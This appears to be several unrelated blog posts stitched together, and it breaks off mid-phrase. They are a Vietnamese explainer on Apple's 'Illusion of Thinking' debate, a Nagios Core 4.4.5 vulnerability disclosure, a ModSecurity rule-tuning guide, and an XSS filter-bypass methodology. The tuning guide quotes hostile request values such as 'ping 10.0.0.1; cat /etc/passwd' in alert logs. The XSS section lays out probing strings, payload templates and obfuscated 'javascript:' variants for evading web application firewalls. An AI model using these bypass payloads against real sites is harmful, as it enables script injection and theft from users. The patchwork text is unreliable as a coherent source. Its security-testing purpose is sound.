Kết quả? đúng là một màn bóc phốt đỉnh cao! Đám AI này tưởng mình “pro”, nhưng hóa ra toàn “chém gió”. Nhóm nghiên cứu chỉ cần tăng độ khó chút xíu, kiểu thêm vài cái đĩa hay cột trong Tháp Hà Nội, là cả lũ AI lăn đùng ra, suy luận lung tung, sai bét nhè. Nói thẳng, tụi nó không có nổi cái tư duy logic như con người, chỉ giỏi “giả bộ thông minh” khi bài dễ.

Tóm lại, nghiên cứu này như kiểu Apple cầm loa phường hét to: “Ê, đám AI lý luận, tụi mày còn non lắm, đừng có ảo tưởng sức mạnh!”

I/ Chuyện gì đang xảy ra?

Gần đây, một cuộc tranh luận lớn đã nổ ra trong thế giới AI. Mọi chuyện bắt đầu với một paper khoa học mà Apple công bố có tên “The Illusion of Thinking” (Ảo tưởng về Tư duy)

Paper này cho rằng ngay cả những AI thông minh nhất hiện nay, được gọi là Mô hình Suy luận Lớn (LRM), thực ra không “suy nghĩ” theo cách chúng ta vẫn tưởng. Các tác giả nói rằng khả năng suy luận của chúng rất mong manh và có vẻ mang tính giả tạo và sẽ “sụp đổ hoàn toàn” khi gặp phải những vấn đề hơi phức tạp một chút.

Tuy nhiên, một nhóm nhà khoa học khác đã phản bác lại, cho rằng paper đầu tiên đã sai. Họ nói rằng những thất bại của AI không phải do chúng không biết suy nghĩ, mà là do cách các nhà khoa học đã thử nghiệm chúng. Cụ thể, các bài kiểm tra có những lỗi nghiêm trọng, như yêu cầu AI viết một câu trả lời dài hơn giới hạn cho phép hoặc bắt chúng giải những câu đố không có lời giải.

Sau 1 chút thời gian ngâm cứu vui vẻ, tôi sẽ giải thích toàn bộ câu chuyện một cách đơn giản:

*Lưu ý: đây là chút giải nghĩa dễ hiểu theo kiểu bình dân để nhiều người có thể đọc hiểu được vấn đề và tôi cũng không phải là dân học thuật

1. Các nhà khoa học của Apple nói gì? Chúng ta sẽ xem xét các bằng chứng mà paper đầu tiên đưa ra, như việc AI đột ngột “bó tay” khi vấn đề khó hơn một chút (“vách đá phức tạp”) và một nghịch lý kỳ lạ là khi vấn đề càng khó, AI dường như càng… lười suy nghĩ hơn.

2. Bài phản biện nói gì? Chúng ta sẽ phân tích lập luận phản bác, cho thấy rằng những “thất bại” của AI thực chất là do lỗi trong phương pháp thử nghiệm.

3. Tương lai của AI sẽ ra sao? Cuộc tranh luận này thực sự rất hữu ích. Nó thúc đẩy các nhà khoa học tìm ra những cách mới để xây dựng AI thông minh hơn, mạnh mẽ hơn.

Chúng ta sẽ xem ba hướng đi thú vị sau:

• AI Lai (Hybrid Systems): Kết hợp AI sáng tạo (giống như nghệ sĩ) với AI logic (giống như kế toán) để có được sự tốt nhất của cả hai.

• AI làm việc nhóm (Multi-Agent Systems): Thay vì một AI khổng lồ làm mọi thứ, chúng ta tạo ra một nhóm các AI nhỏ hơn, mỗi AI chuyên về một việc và chúng hợp tác với nhau.

• AI học từ kinh nghiệm (Reinforcement Learning): Dạy AI bằng cách cho chúng thử và sai, thưởng cho những bước đi đúng đắn, giúp chúng tự cải thiện khả năng suy luận.

Mặc dù paper “Ảo tưởng về Tư duy” có thể đã phóng đại vấn đề do phương pháp luận có thể có sai sót, nó vẫn đem lại những giá trị nhất định.

Nó giống như một bài kiểm tra sức chịu đựng, phơi bày những điểm yếu của AI hiện tại và cách chúng ta đánh giá chúng. Bài nghiên cứu của Apple đã buộc cộng đồng AI phải chuyển hướng, không chỉ tập trung vào việc tạo ra các AI lớn hơn, mà còn phải tạo ra các AI có kiến trúc thông minh hơn, linh hoạt hơn và có khả năng hợp tác.

II. “Ảo tưởng về Tư duy”: AI thực sự suy nghĩ như thế nào?

Phần này sẽ giải thích ngắn gọn bài paper của Apple

A. Câu hỏi cốt lõi: AI đang suy nghĩ hay chỉ bắt chước?

Paper của Apple đặt ra một câu hỏi rất quan trọng: Liệu các AI tiên tiến như Claude 3.7 hay các mô hình của OpenAI có thực sự suy luận một cách logic, hay chúng chỉ đơn thuần là các mẫu câu trả lời mà chúng đã thấy hàng triệu lần trong dữ liệu huấn luyện?

Các tác giả cho rằng các bài kiểm tra thông thường không đủ tốt để trả lời câu hỏi này vì chúng có thể bị “nhiễm” dữ liệu (AI đã thấy câu trả lời trước đó) và không cho chúng ta biết AI đã “suy nghĩ” như thế nào để đi đến kết quả.

B. Một cách kiểm tra mới: Các câu đố có thể kiểm soát

Để giải quyết vấn đề này, các nhà nghiên cứu đã sử dụng bốn loại câu đố kinh điển để kiểm tra AI, thay vì các bài toán phức tạp 1:

1. Tháp Hà Nội: Trò chơi chuyển các đĩa qua cọc, đòi hỏi lập kế hoạch.

2. Cờ Nhảy: Trò chơi di chuyển các quân cờ để đổi chỗ cho nhau.

3. Vượt Sông: Câu đố logic về việc đưa người và vật qua sông an toàn.

4. Thế giới Khối: Trò chơi sắp xếp các khối hộp theo một thứ tự nhất định.

Họ cho rằng các câu đố này tốt hơn:

• Có thể dễ dàng điều chỉnh độ khó.

• AI ít có khả năng đã “học thuộc lòng” lời giải.

• Chỉ cần tuân theo các quy tắc đơn giản, kiểm tra logic thuần túy.

• Có thể kiểm tra từng bước đi của AI để xem nó có mắc lỗi ở đâu không.

C. “Vách đá phức tạp”: Khi AI đột ngột thất bại

Đây là phát hiện gây sốc có lẽ là nhất. Tất cả các AI được thử nghiệm đều hoạt động rất tốt với các câu đố đơn giản. Nhưng khi độ khó tăng lên một chút (ví dụ, thêm vài cái đĩa trong Tháp Hà Nội), độ chính xác của chúng đột ngột giảm xuống 0%.

Nó không giảm từ từ, mà rơi thẳng đứng như một “vách đá”.

Các nhà nghiên cứu đã chỉ ra ba giai đoạn:

1. Độ khó thấp: Các AI thông thường (không có chế độ “suy nghĩ”) lại làm tốt hơn.

2. Độ khó trung bình: Các AI có chế độ “suy nghĩ” thể hiện ưu thế rõ rệt.

3. Độ khó cao: Cả hai loại AI đều thất bại hoàn toàn.

Điểm down về độ chính xác của AI trong các câu đố

D. Nghịch lý về sự suy giảm: Càng khó, càng lười?

Đây là phát hiện kỳ lạ nhất. Khi các câu đố trở nên khó hơn và tiến gần đến “điểm sụp đổ”, AI dường như lại giảm nỗ lực suy nghĩ của mình. Lượng “token suy nghĩ” (có thể coi là thước đo nỗ lực) mà chúng tạo ra lại ít đi.

Các tác giả khẳng định rằng điều này xảy ra ngay cả khi AI có “ngân sách suy luận dồi dào” (tức là chúng có đủ khả năng để suy nghĩ nhiều hơn).

Họ kết luận rằng đây là một hạn chế cơ bản trong khả năng suy luận của AI, chứ không phải do thiếu tài nguyên.

E. Bên trong “hộp đen”: Những hành vi khó hiểu

• “Suy nghĩ quá mức”: Với các bài toán dễ, AI thường tìm ra đáp án đúng ngay từ đầu, nhưng sau đó lại tiếp tục khám phá các phương án sai, gây lãng phí.

• Không biết dùng thuật toán: Ngay cả khi được cung cấp thuật toán giải Tháp Hà Nội một cách rõ ràng, AI vẫn không thể làm theo và vẫn thất bại ở cùng một điểm.

Điều này cho thấy chúng gặp khó khăn trong việc tuân theo các bước logic một cách chính xác.

III. Có phải do lỗi của người thử nghiệm?

Một paper khác đã phản bác, cho rằng những phát hiện trên chỉ là “ảo tưởng” do cách thiết kế thí nghiệm có vấn đề.

A. Vấn đề giới hạn đầu ra: AI không “lười”, mà là “hết giấy”

Lập luận chính của bài phản biện là sự “sụp đổ” xảy ra vì AI đã đạt đến giới hạn độ dài tối đa cho phép của câu trả lời.

Paper yêu cầu AI phải liệt kê toàn bộ các bước đi. Với câu đố Tháp Hà Nội, số bước tăng theo cấp số nhân.

Ví dụ, để giải bài toán với 15 đĩa, cần 32,767 bước. Việc viết ra tất cả các bước này sẽ cần một lượng token (từ ngữ) khổng lồ, vượt xa giới hạn 64,000 token mà các nhà nghiên cứu đã đặt ra.

Điểm mà AI “sụp đổ” trùng khớp một cách hoàn hảo với điểm mà độ dài câu trả lời vượt quá giới hạn cho phép. Vì vậy, AI không phải là “từ bỏ”, mà là nó không thể viết một câu trả lời dài đến thế về mặt vật lý.

B. Vấn đề câu đố bất khả thi: Bắt AI giải bài toán không có lời giải

Bài paper còn phát hiện một lỗi nghiêm trọng khác: trong câu đố Vượt Sông, các nhà nghiên cứu đã đưa ra những trường hợp không thể giải được về mặt toán học.

AI đã bị chấm điểm “thất bại” vì không thể giải một bài toán vốn không có lời giải. Điều này cho thấy sự thiếu nghiêm ngặt trong quá trình đánh giá của paper gốc.

C. Thí nghiệm phản biện: Thay đổi cách hỏi

Để chứng minh quan điểm của mình, các tác giả bài paper phản biện đã thực hiện một thí nghiệm. Thay vì yêu cầu AI liệt kê hàng chục nghìn bước đi cho Tháp Hà Nội với 15 đĩa, họ yêu cầu:

“Hãy viết một chương trình máy tính nhỏ (hàm Lua) để in ra lời giải cho Tháp Hà Nội với 15 đĩa.”.

Kết quả: Các AI trước đây bị điểm 0 giờ đây đã hoàn thành xuất sắc nhiệm vụ, chỉ với chưa đến 5,000 token. Điều này chứng tỏ khả năng suy luận và hiểu thuật toán của AI vẫn còn nguyên vẹn.

Vấn đề không nằm ở “tư duy” mà ở cách “trình bày” câu trả lời.

So sánh kết quả hai cách thử nghiệm cho Tháp Hà Nội (15 đĩa)

D. Nhìn lại cuộc tranh luận

Cuộc tranh luận này là một bài học có giá trị về tầm quan trọng của việc thiết kế các bài kiểm tra. Cách chúng ta đánh giá AI có thể tạo ra những hiện tượng sai lệch.

Nó cho thấy chúng ta cần phải xem xét kỹ lưỡng các phương pháp đánh giá của mình cũng như chính các mô hình AI.

IV. Xây dựng AI suy luận mạnh mẽ hơn

Cuộc tranh luận này đã thúc đẩy các nhà khoa học tìm kiếm những kiến trúc AI mới, mạnh mẽ hơn.

A. AI Lai (Hybrid): Kết hợp sự linh hoạt và chính xác

Vấn đề: AI hiện tại gặp khó khăn trong việc tuân theo các quy tắc logic và thuật toán một cách chính xác.

Giải pháp: Các hệ thống lai kết hợp mạng noron (giỏi nhận dạng mẫu, linh hoạt) với các hệ thống biểu tượng (giỏi logic, chính xác, có thể kiểm chứng).

Ví dụ: HybridMind: Khung này có một “bộ chọn” thông minh, tự động quyết định khi nào nên dùng ngôn ngữ tự nhiên (cho các nhiệm vụ khái niệm) và khi nào nên dùng mã lập trình (cho các nhiệm vụ đòi hỏi tính toán chính xác).

Kết quả cho thấy cách tiếp cận này hiệu quả hơn nhiều so với việc chỉ dựa vào một mô hình duy nhất, dù nó mạnh đến đâu.

B. AI làm việc nhóm (Multi-agent): Chia để trị

Vấn đề: Một AI duy nhất có thể bị “quá tải” khi đối mặt với các vấn đề phức tạp.

Giải pháp: Các hệ thống đa tác tử chia một vấn đề lớn thành các nhiệm vụ nhỏ hơn và giao cho các AI chuyên biệt. Các AI này sẽ hợp tác với nhau để tìm ra giải pháp cuối cùng.

Ví dụ 1 : A3T (AI as a Team): Kiến trúc này được tạo ra như một phản ứng trực tiếp với paper “Ảo tưởng về Tư duy”. Nó sử dụng một nhóm các AI chuyên biệt (một AI đề xuất, một AI đánh giá, một AI tổng hợp) làm việc theo một quy trình có cấu trúc để đảm bảo vấn đề được giải quyết một cách tận cùng nhất.

Ví dụ 2 : Magentic-One: Một hệ thống mã nguồn mở của Microsoft, có một AI “Điều phối viên” quản lý công việc và giao nhiệm vụ cho các AI chuyên về lướt web, xử lý tệp, viết code, …etc

C. Reinforcement Learning — RL: Tự cải thiện

Vấn đề: Việc chỉ học từ các bộ dữ liệu tĩnh là không đủ để tạo ra khả năng suy luận linh hoạt.

Giải pháp: Học tăng cường cho phép AI học hỏi từ việc thử và sai. Các phương pháp RL gần đây đã trở nên tinh vi hơn, giúp tối ưu hóa quá trình suy luận một cách hiệu quả.

Ví dụ 1 : SiriuS: Khung này xây dựng một “thư viện kinh nghiệm” bằng cách thu thập các chuỗi tương tác thành công của các AI. Thư viện này sau đó được dùng làm dữ liệu chất lượng cao để huấn luyện và cải thiện các AI, giúp chúng tự khởi động quá trình học hỏi của mình.

Ví dụ 2 : RL cho AI nhỏ: Một nghiên cứu cho thấy chỉ với một ngân sách rất nhỏ (42 USD), họ có thể cải thiện đáng kể khả năng suy luận toán học của một mô hình AI nhỏ bằng cách sử dụng các thuật toán RL tiên tiến và các phần thưởng thông minh.

Điều này thách thức quan niệm rằng “cứ to là tốt”.

So sánh các hướng tiếp cận mới cho AI suy luận

V. Kết luận và Hướng đi Tương lai

A. Tổng kết cuộc tranh luận

Bài paper “Ảo tưởng về Tư duy” rất quan trọng, nhưng có lẽ phần nào có kết luận sai lầm. Giá trị lớn nhất của nó là đã khơi mào cho một cuộc tranh luận cần thiết, buộc chúng ta phải nhìn nhận lại những điểm yếu của AI. Bài phản biện đã chỉ ra một cách thuyết phục rằng “sự sụp đổ” của AI chủ yếu là do lỗi trong cách chúng ta kiểm tra chúng.

Sự thật nằm ở đâu đó giữa hai luồng ý kiến: AI hiện tại không phải là những cỗ máy chỉ biết bắt chước, nhưng khả năng suy luận của chúng vẫn còn xa mới đạt đến mức độ mạnh mẽ và đáng tin cậy như con người.

B. Tương lai của việc đánh giá AI

Chúng ta cần những bài kiểm tra AI tốt hơn, nghiêm ngặt hơn.

1. Bộ tiêu chuẩn tốt hơn: Cần các bài kiểm tra không bị “nhiễm” dữ liệu và có các quy tắc công bằng, khả thi.

2. Đánh giá quá trình, không chỉ kết quả: Cần phân tích các bước suy luận của AI để xem chúng có logic và hiệu quả không.

3. Kiểm tra các kỹ năng cụ thể: Cần các bài kiểm tra nhắm vào các kỹ năng suy luận riêng biệt như suy luận không gian hay khả năng tự nhận ra lỗi sai của mình.

Con đường dẫn đến AI thông minh hơn không chỉ đơn giản là xây dựng các mô hình lớn hơn.

1. Chấp nhận sự lai ghép: Đầu tư vào các kiến trúc kết hợp AI ngôn ngữ với các công cụ logic bên ngoài (như HybridMind). Đây là cách nhanh nhất để khắc phục các lỗi tính toán.

2. Phân rã sự phức tạp: Sử dụng các hệ thống AI làm việc nhóm (như A3T và Magentic-One) cho các nhiệm vụ phức tạp. Việc chia nhỏ công việc giúp hệ thống trở nên mạnh mẽ và dễ quản lý hơn.

3. Tối ưu hóa hiệu quả: Tập trung vào các kỹ thuật học tăng cường tiên tiến (như SiriuS) để tạo ra các AI suy luận hiệu quả hơn mà không cần đến các bộ dữ liệu khổng lồ.

I. OVERVIEW

• Discoverer: Aishee — UraSec Team

• Vendor & Product: Nagios Core

• Version: Nagios Core 4.4.5

II. ABOUT NAGIOS CORE

Nagios is a free and open-source computer-software application that monitors systems, networks and infrastructure. Nagios offers monitoring and alerting services for servers, switches, applications and services. It alerts users when things go wrong and alerts them a second time when the problem has been resolved.

III. VULNERABILITY DETAILS

Location: Alert Histogram and Trends function.

I could insert malicious files in Alert Histogram and Trends function, only need setup other server and compile nagios file objectjson.cgi, archivejson.cgi, statusjson.cgi and copy to server.

Video POC

IV. IMPACT

- Insert content that is harmful to users

- Ability to escalate exploits creating backdoors for applications

- ..etc

V. REMEDIATION

Nagios Core 4.x Version History - Nagios
4.4.6 - 2020-04-28 FIXES Fixed Map display in Internet Explorer 11 (#714) (Scott Wilkerson) Fixed duplicate properties…www.nagios.org

sawolf/nagioscore
Nagios is a host/service/network monitoring program written in C and released under the GNU General Public License…github.com

VI. REPORT TIMELINE

• 04/12/2020: Discovered the vulnerability

• 04/12/2020: Responsible disclosure to Nagios Enterprise security@nagios.com

• 04/18/2020: Nagios Enterprise confirmed the issue and released a branch fix

VII. THANKS TO

• swolf@nagios.com confirm issue and fix.

“You can’t rely on anyone these days, you gotta do everything yourself.”

The Joker!

I haven’t written in a while. Now I have some time to share some of my old experiences.

Start

We often use WAF to protect website, but in the process of using, certainly many times you encounter the case of mistakenly blocking non-malicious requests.

That seems to make us uncomfortable or take a lot of effort to find its cause, probably because we have not optimized the rules of use properly. The false positive could be due, waf working too hard, consuming compute resources for something wrong, will make it block clean traffic.

Sometimes tired, they might think about it, uninstall WAF :v

Tuning WAF is a tedious process, here I will share some ways to minimize false positive for WAF, It will help you properly block malicious traffic and greatly reduce false positives. This article will talk about ModSecurity.

ModSecurity, sometimes called Modsec, is an open-source web application firewall (WAF). Originally designed as a module for the Apache HTTP Server, it has evolved to provide an array of Hypertext Transfer Protocol request and response filtering capabilities along with other security features across a number of different platforms including Apache HTTP Server,[1][2] Microsoft IIS and NGINX. https://en.wikipedia.org/wiki/ModSecurity

We often use OWASP ModSecurity Core Rule Set (CRS) in combination with ModSecurity. This is the best set of rules to prevent attacks on OWASP Top Ten projects. CRS is a rule set scoring anomaly incoming request.

It uses blacklist techniques to detect attacks from incoming requests. It allows you to adjust the aggressiveness level of rule set (Paranoia Level in crs-setup.conf)

Something with real attacks

For multi-user websites or a application targeted by an attacker, the number of alerts generated is extremely large. That will make a lot of mistakes happen to CRS because i see many people after installing ModSecurity and CRS rule set often run in default mode.

We should pay attention to Paranoia Level in CRS to tune it, raising Paranoia Level will turn off CRS default mode when installing, the higher the level setting, the more rules are enforced. It could be called when it was a crazy beast that caused many false positives.

Thinking of out of the box if you want to reduce the number of false positives. If intermix with traces of true attacks, the value that we receive with CRS will be lost. So, we have to remove the false positive to have a cleaner installation for valid queries and prevent a real attacker.

Problems:

- Identify a false positive practical

- Deal with false positives practical

Hundreds of alerts are generated, it’s really hard to determine exactly the false positive. We have several ways to do that.

- Understand the application to be protected, it will help us determine request but very suspicious, from malicious requests. But if we are lazy we have to think of another way :))). We can filter each alert and create a data set that only includes false positive warnings. That will help you determine where exactly the attack.

- You can use the IP address to identify basic information about known users, localnet, etc. You may think that the user who successfully authenticated the login is not an attacker (very naive :))) or some other identification method, it depends on the setup and testing process you have.

When identifying a false positive entity, we will have many approaches to avoid repeating similar errors in the future. With CRS, you probably won’t revise the rule set because you think it works without interference or works very smoothly and coherently. You will reconfigure the ruleset usage through the ModSecurity directives, which allow you to apply the same changes to future versions of CRS without having to repeat your changes.

I offer simple ways to handle false positives:

- Disable a rule

- Delete an argument from the regex according to a rule

- Disable rule based on request URI at run time

- Remove an argument for a runtime request from a regex according to the rules

But it is clear that disabling a rule will affect the overall detection rate of the rule set. In fact, it takes a bit of experience to make the optimal choice in all cases, the slightest change to ruleset allows for suspicious but not really dangerous pass requests.

Scaling Tuning

To get the best option, try and try. Normally, many people just approach a bunch of alerts and try to work with it, sometimes it is very laborious but the effect is very low.

Example:

2019/07/19 22:47:21 [info] 7962#7962: *1 ModSecurity: Warning. Matched "Operator `PmFromFile' with parameter `lfi-os-files.data' against variable `ARGS:test' (Value: `/etc/passwd' ) [file "/etc/modsec/rules/custom/crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "71"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/passwd found within ARGS:test: /etc/passwd"] [severity "2"] [ver "OWASP_CRS/3.1.1"] [maturity "0"] [accuracy "0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "127.0.0.1"] [uri "/index.html"] [unique_id "151603875418.798396"] [ref "o1,10v21,11t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase"], client: 127.0.0.1, server: localhost, request: "GET /index.html?test=/etc/passwd HTTP/1.1", host: "localhost"

If we receive hundreds of thousands of alerts every day, our fatigue will increase many times.
 To solve this problem earlier, I also wrote some tools to support, it will be public soon for everyone.

Example:

{"maturity": "0", "tag": "PCI/6.5.4", "file": "/etc/modsec/rules/custom/crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf", "type": "Local File Inclusion attack\n", "rev": "", "ver": "OWASP_CRS/3.1.1","msg": "OS File Access Attempt", "uri": "/", "id": "930120", "line": "78", "severity": "2", "hostname": "x.x.x.x", "data": "Matched Data: etc/passwd found within ARGS:command: ping 10.0.0.1; cat /etc/passwd", "ref": "o20,10v14,30t:utf8toUnicode,t:urlDecodeUni,t:normalizePathWin,t:lowercase", "accuracy": "0", "unique_id": "156089115890.272782", "date": "2019/07/19"}

{"maturity": "0", "tag": "PCI/6.5.2", "file": "/etc/modsec/rules/custom/crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf", "rev": "", "ver": "OWASP_CRS/3.1.0", "msg": "Remote Command Execution: Unix Shell Code Found", "uri": "/", "id": "932160", "line": "481", "severity": "2", "hostname": "x.x.x.x", "data": "Matched Data: etc/passwd found within ARGS:command: ping 10.0.0.1 cat/etc/passwd", "ref": "o18,10v14,30t:urlDecodeUni,t:cmdLine,t:normalizePath,t:lowercase", "accuracy": "0", "unique_id": "156089115890.272782", "date": "2019/07/19"}

{"maturity": "0", "tag": "attack-generic", "file": "/etc/modsec/rules/custom/crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf", "type": "Blocking evaluation\n", "rev": "", "ver": "", "msg": "Inbound Anomaly Score Exceeded (Total Score: 23)", "uri": "/", "id": "949110", "line": "80", "severity": "2", "hostname": "x.x.x.x", "data": "", "ref": "", "accuracy": "0", "unique_id": "156089115890.272782", "date": "2019/07/19"}

{"maturity": "0", "tag": "event-correlation", "file": "/etc/modsec/rules/custom/crs/rules/RESPONSE-980-CORRELATION.conf", "type": "Correlation\n", "rev": "", "ver": "", "msg": "Inbound Anomaly Score Exceeded (Total Inbound Score: 23 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=15,PHPI=0,HTTP=0,SESS=0): Remote Command Execution: Unix Shell Code Found; individual paranoia level scores: 23, 0, 0, 0", "uri": "/", "id": "980130", "line": "76", "severity": "0", "hostname": "x.x.x.x", "data": "", "ref": "", "accuracy": "0", "unique_id": "156089115890.272782", "date": "2019/07/19"}

I have normalized JSON format to be able to push into the common SIEM or ELK stack. It is easy for us to read and understand the alert information.

For example, the above warning shows that rule 930120 is triggered by having an existing command “ping 10.0.0.1 cat / etc / passwd” in request.
 An attacker is trying to execute operating system commands, is the ping command and reads /etc/passwd.

When we transmit an encrypted string or exist some type of data such as hex code, CRS is often confused and gives false positive warnings. CRS will think of this as a clean request as a malicious request that the attacker encrypts information to conceal, such as session ID, etc.

Think

For optimal handling, one should think of a different approach, try different perspectives, not look at different rules, but look in the direction of requests that trigger those rules up.

Finding out the anomaly of all requests to the server is important. Not only properties related to scored evaluation, but also those that do not generate any warnings.

We can clearly see its score is zero, but we have to calculate the number of requests in this list to better understand the false positive ratio.

For apache and nginx applications, using apache is easy for ModSecurity to create unusual points of every request right in the access logs. For nginx to use a different technique, add a rule that creates anomalies after the request is made.

SecAction \
    "id:980xxx,\
    phase:5,\
    pass,\
    t:none,\
    log,\
    noauditlog,\
    msg:\'Incoming Anomaly Score: %{TX.ANOMALY_SCORE}\'"

Result:

cat /var/log/nginx/error.log | grep 980xxx | egrep -o "Incoming Anomaly Score: [0-9]+" | cut -b25-
0
10
4
5
8
0
12
0
3
1
0
0
...

On the right are requests that are blocked and a warning appears. The highest number of requests with an unusual score is 1, where all requests bypassed through the rules without any alerts are generated.

The higher the column, the higher the score, which can be considered as the most suspicious requests. The lower the column, the lower the score, only activating one or two rules

As is known, the CRS is an unusual set of scoring rules, the first request will pass through the entire rule and the score will start to be calculated.

I will then compare the generated anomalies with the anomaly threshold (default threshold = 5) such as single abnormal critical pricing warning will result in the request being blocked. This is how I want it to be set up securely!

We can change this threshold if we want and in fact it means a lot. For example, once, I put the threshold up to 12,000 (in the actual process I have seen the number of score up to 12,000). I can assure you that no clean requests are blocked by CRS. In such a way I could make adjustments to minimize false positives, balancing them with real systems.

My advice in minimizing is that we should not immediately reduce a shot to 5 in a single shot. Go 10,000->100->50->20->10->5! Final target.

Of course, the way will get in the way, and the solution is like. Take a look at the chart again. If I set the anomaly threshold to 50, I would block requests with a score of 60, if we wanted to lower the limit, I would have to handle these requests better and all other requests got a higher score. with target limit

No need to look at the remaining false false alert results right away because we might be scared of pee =))). We will focus on the minimum number of requests with the highest anomaly score at the start. If I can determine these, I can filter alerts with this high score via unique identification of the alert ModSecurity.

Then use unique IDs to find alerts that score above

grep 980xxx /var/log/nginx/error.log  | grep "Incoming Anomaly Score: 60\"" | melunique_id > msg_ids

grep -F -f ids /var/log/nginx/error.log | melidmsg | sort | uniq -c | sort -n
  28 941140 XSS Filter - Category 4: Javascript URI Vector
 43 932130 Remote Command Execution: Unix Shell Expression Found
 47 941210 IE XSS Filters - Attack Detected.
 65 941170 NoScript XSS InjectionChecker: Attribute Injection

I will adjust these false positive points and position them to lower the abnormal threshold with great certainty that no clean requests will be blocked.

It will take a little while for beginners to do this.

Try and try, that’s the way I recommend. Adjusting false positives makes it impossible to lower the threshold further. Look at the requests and analyze them. The number of requests that we have to repeat the test also significantly reduced compared to before

Most of the rules with the highest scores are the same rules with average scores => if I process the first rule set that leads to the highest score, then the second adjustment only has to handle the false positives are not included in requests with the highest score.

The whole method allows the structure to conform to the CRS to minimize the elimination of false positives.

My advice is to be able to give them one by one, usually dealing with five to ten false positives in a given iteration, when performing more processing, take a smaller step.

All work as a game for funs =))) and we have to play as an artist, be like The Joker

Be like an artist and you can adjust your abnormal thresholds in a good and quick way to improve the security of your website system, recommends it significantly only starting with the same threshold of 20 or lower

In the NUTSHELL

1. Work in blocking mode

2. Originally, set Anomaly threshold to a very high number

- Try try and try

3. Review the request with the highest abnormal score and handle the false positive results it causes

4. Lower the abnormal point threshold to rinse and continue the loop until the points of abnormalities fall to five

Above are some of my small experiences, when I have time I will share some more deep and optimal approaches.

The entire method works for Apache and Nginx!

Refer:

- Thanks for my friends

- https://httpd.apache.org/

- https://www.nginx.com/

- https://coreruleset.org

- Google keyword: “ModSecurity Tutorials”

“The only sensible way to live in this world is without rules.”

I like The Joker.

I like that he’s as mysterious as he is cruel!

Basically sad life like dog bite, a scary world.

A little simple knowledge for everyone.

This article focuses on WAF’s ability to bypass the ability to detect Cross Site Scripting (XSS).

The follow:

- Determining payload structure: Determining various payload structures for a given context provides a precise idea of the optimal testing approach.

- Probing: Probing, involves testing various strings against the target’s security mechanisms.

- Obfuscation: obfuscation/other tweaks payload if required.

The returned responses will help us analyze the assumptions about the solution used.

I/Introduction

Cross-Site Scripting (XSS) attacks are a type of injection. https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

II/HTML

Inside Tag:

<input type="text" value="$input">

Outside Tag:

<span>You entered $input</span>

• Outside Tag: primary character for starting an HTML tag

According to the HTML specification, a tag name must start with an alphabet

=> the information can be used to determine the Regex match the tag name.

<dEv - If fails, <[a-zA-Z]+ 
<d3V - If fails, <[a-zA-Z0-9]+ 
<d|3v - If fails, <.+
<svg - If passes, no tag checking is in place
<dev - If fails,<[a-z]+
x<dev - If passes,^<[a-z]+

Without any of allowed by the security mechanism, it is almost impossible bypass. Such filtering rules are not preferred due to high false positives.

If unblock, a number payload schemes -> new payload created.

#1

<{tag}{filler}{event_handler}{?filler}={?filler}{javascript}{?filler}{>,//,Space,Tab,LF}

Once an appropriate {tag} found -> Predictive regular expressions are used to match filler between tag and event handler.

<tag%0axxx - if fails, [\s\n]+
<tag%0dxxx> - If fails, [\s\n\r+]+
<tag/~/xxx - If fails, .+
<tag xxx - If fails, {space}
<tag%09xxx - if fails, [\s]
<tag%09%09xxx - if fails, \s+
<tag/xxx - If fails, [\s/]+

Event handling is one of the most important parts of the payload structure.

Usually it will be combined with a regular Regex

on\w+

or blacklist

on(load|click|error|show)

The first regular expression is very limited and cannot bypass, while blacklist are often bypass by using lesser known event handlers that may no t in blacklist.

<tag{filler}onxxx - If fails, on\w+. If passes, on(load|click|error|show)
<tag{filler}onclick - If passes, no event handler checking regular expression is in place

If the regular expression to be ‘ on\w+’ this expression cannot bypass because all event handlers start with on => next payload scheme.

If the regular expression follows the blacklist, we will find event handlers that are not blacklisted. If all event handlers are blacklisted -> next payload scheme.

Example:

onauxclick
ondblclick
oncontextmenu
onmouseleave
ontouchcancel

The testing of fillers to = is similar filler earlier and should be only tested if ‘<tag{filler}{event_handler}=d3v’ => blocked by the security mechanism.

The next component JavaScript to be executed. This is the part of the payload, but making regular expression assumptions used to match it is not required because JavaScript code is arbitrary and therefore cannot match predefined patterns.

=> Point in now, all components of the load are put together and payload only needs to be closed

<payload%0a 
<payload%0d 
<payload%09
<payload>
<payload
<payload{space}
<payload//

HTML specification allows

<tag{white space}{anything here}>

which indicates that an HTML tag such as

<a href='http://example.com' any text can be placed here as long as there's a greater-than sign somewhere later in the HTML document>

is valid. This attribute of HTML tags helps an attacker to inject HTML tags in the ways mentioned above.

#2

<sCriPt{filler}sRc{?filler}={?filler}{url}{?filler}{>,//,Space,Tab,LF}

Testing similar to the previous payload scheme. That ? can be used at the end of the URL (if the filler is not used after the URL) instead of ending the tag.

Character follows ? will be considered part of the URL until > is encountered. With <script> tags, most security rules can be detected.

<object> tags can be created payload using the same payload scheme:

<obJecT{filler}data{?filler}={?filler}{url}{?filler}{>,//,Space,Tab,LF}

#3

Two variants:

• Plain

• Obfuscatable

Simple variants combined by patterns like

href[\s]{0,}=[\s]{0,}javascript:.

Its structure:

<A{filler}hReF{?filler}={?filler}JavaScript:{javascript}{?filler}{>,//,Space,Tab,LF}

Obfuscatable payload variant structure:

<A{filler}hReF{?filler}={?filler}{quote}{special}:{javascript}{quote}{?filler}{>,//,Space,Tab,L
F}

Difference is {special} component as well as the {quote}.

{special} ref to an obfuscated version:

j%0aAv%0dasCr%09ipt:
J%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0aT%0a:
J%0aa%0dv%09a%0as%0dc%09r%0ai%0dp%09T%0d%0a:

In some cases, numeric character encoding can also be used to evade detection. As well as decimal and hexadecimal can be used.

Javascript:
javascript:

Two techniques of obfuscation can be used together if needed

Java%0a%0d%09script:

Exe and Non

